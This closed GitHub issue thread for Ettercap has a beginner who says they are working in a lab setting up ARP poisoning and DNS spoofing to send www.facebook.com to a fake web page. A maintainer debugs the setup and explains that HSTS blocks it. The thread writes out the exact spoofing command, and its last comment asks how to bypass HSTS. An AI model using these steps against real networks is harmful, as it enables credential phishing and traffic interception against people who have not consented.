Closed ricko2991 closed 3 years ago
So maybe the new versions use DNS-over-HTTPS? What could Ettercap do about that? Stop bitching... Edit: Here are some articles on DoH:
Hi, thanks for answering, I have turned off DoH in firefox and somehow in chrome it doesn't have the settings to set it:
I'm looking for chrome here and can't find a setting to turn off Secure DNS lookups:
chrome: // flags / # dns-over-https
Is this correct?
No, drop the spaces. Should be: chrome://flags/#dns-over-https
.
And a restart of Chrome is needed.
yes, i did it in chrome but i can't find secure dns lookups settings. and also I have disabled DoH on firefox and I can't do the redirect yet. Same as the error message in the image above
Actually you haven't provided any information that is related to Ettercap. The use of DoH doesn't explain why you're getting connection refused. Also when HSTS results in no-user-recourse, a different error message is being presented. Connection refused is a network level error, but we cannot help you when you not make your lab environment transparent.
Hi, This is my lab enviroment use ettercap: ettercap version 0.8.3.1 Os : kali linux
1. This is the domain page to be redirected. i'm add from /etc/ettercap/etter.dns
2. I enable apache2 to redirect the link that the target will open. So I already have a page that I have created myself and I hope that it will appear.
3. This is the command i use in ettercap :
ettercap -Tqi eth0 -P dns_spoof -M arp /// ///
4. This is the capture packet on www.facebook.com when i open the link:
5. To find out if I have really infected the router I check it with the command nslookup www.facebook.com
on the target machine, and DNS is points to the Ip I am using
sorry if there are mistake, This is my first time learn MITM, and I am using ettercap as my environmental testing tool
OK thanks. That at least proves that traffic from the client machine is directed to your ettercap machine via ARP poisoning and that the DNS spoofing works. Now the next question is if your web-server works correctly. Can you check with CLI http-client curl:
curl -v http://www.facebook.com
curl -v https://www.facebook.com
... from the client machine that is poisoned of course
Yes, that's right when I use http://www.facebook.com
it will display my web page.
But on https://www.facebook.com
connection refused
Why that's happen? But when i enter http://www.facebook.com on chrome, the site (facebook) it's still refused the connection
Ah yes. So this is really due HSTS. From our Wiki in regard to HSTS:
Even when the user types in the addressbar http://www.website.com, the browser internally makes the http:// to https://.
See RFC6797 Section 8.3 paragraph 5
So that means, essentially, that your browser insists on https because its known as a HTTPS only website to the browser. Maybe even due to pre-configured domain-list.
This is essentially the reason for the error message you experience. Your webserver doesn't listen on port 443, hence it refuses a connection attempt to it. So you should make your webserver up for serving the website for HTTPS as well.
However you'll probably get step further but then mudding into the HSTS no user-recourse trouble (RFC6797 Sect. 12.1) that the client-machine must not experience any "issues" with the certificate. Firefox is even harder as it's apparently caching the signature value of the server certificates once successfully loaded.
Ok, I read a little on the wiki and it was probably about the signature of a certificate that the browser must trust so that the user can be allowed to get in the server right?
And how do I create a trusted certificate in a web browser so that it doesn't block and can open the web server that I created. Sorry if my question is incompetent, I just want to learn.
As far as I know, Firefox has it's own certificate trust store while Chrome leverages the store of the OS. So in Firefox, the easiest way is to add an exception to the Server certificates tab. There you can import the certificate that your web-server is using. This should avoid any security warnings.
So here I just need to make a certificate on my website so that my website can be legit? This is the problem, I also don't know how to create a certificate on the website, I'm still a beginner and need a lot to learn. But that's okay, I just wanted to ask and find out how DNS Spoof can be blocked
Or can ettercap make a certificate for me? I also read on the wiki that ettercap can provide --certificate
and --private-key
parameters. Is that also a step to make it have certificate? And how can I make it
No this is nothing that helps you with your fake webserver problem. It's related to the on-demand server certificate creation used for SSL interception.
Google it. You'll find many resources that explains how to create a certificate for a apache webserver. In regard to this issue, we found out, that DNS spoofing does work and that's just the lack of HTTPS support of your fake webserver in combination with the HSTS countermeasures produces the behaviour you experience.
Therefore I'll close this issue now. You're free to open a new one if you still feel there is a defect with Ettercap.
Thank you @koeppea
Hi, when I try to attack the web that has an old version it work, but when I try to another or the latest version it doesn't work or error. Maybe this is because the hsts in the web browser makes it inaccessible and if it is hsts, how can I bypass it?